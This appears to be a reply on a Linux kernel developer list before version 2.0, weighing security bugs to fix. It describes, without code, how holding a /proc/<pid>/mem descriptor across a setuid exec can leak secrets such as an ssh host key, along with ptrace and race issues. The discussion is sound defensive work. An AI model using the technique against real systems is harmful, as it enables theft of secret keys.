Thanks for that. I'll put it in the Documentation directory as
a note about buggy NCSA stuff.
> Now back to things to fix before 2.0:
>
> - /proc is still insecure :-(. You can open /proc/<pid>/mem and
> hold the file descriptor, then have the target process exec some
> setuid/setgid/unreadable program and read its memory at will.
> Not good for things like ssh - the secret host key is there...
Arghhh... Linus ????. We definitely need to break the association for
setuid/setgid apps. It wouldnt actually be hard to do.
> - somewhat related: it shouldn't be possible to ptrace unreadable
> programs (just like set[ug]id), they may be unreadable for a reason
> like encryption key compiled in, etc. Also, ld.so needs some way
> to know the program is unreadable so it won't accept LD_xxx (this
> may need kernel support, syscall to read the dumpable flag maybe?)
There are millions of these, core dumping etc. Its basically I think a
unix feature. At least we dont have compiled in passwords like GCOS3
had.
> - do we still have the verify_area/memcpy race? (I guess yes, but
> I hope I am wrong... what if the area is unmapped while the process
> sleeps between verify_area and memcpy?)
You can get a non fatal Oops: out of that yes. The ftruncate disk corrupt
bug is gone.
> - bad_user_access_length should be available to modules for old gcc
> users, in ksyms.c or perhaps as inline function conditional on the
> version of gcc? (otherwise at least ncpfs won't load)
Use gcc 2.7.x - 2.5.8 miscompiles stuff in the current kernel.
Alan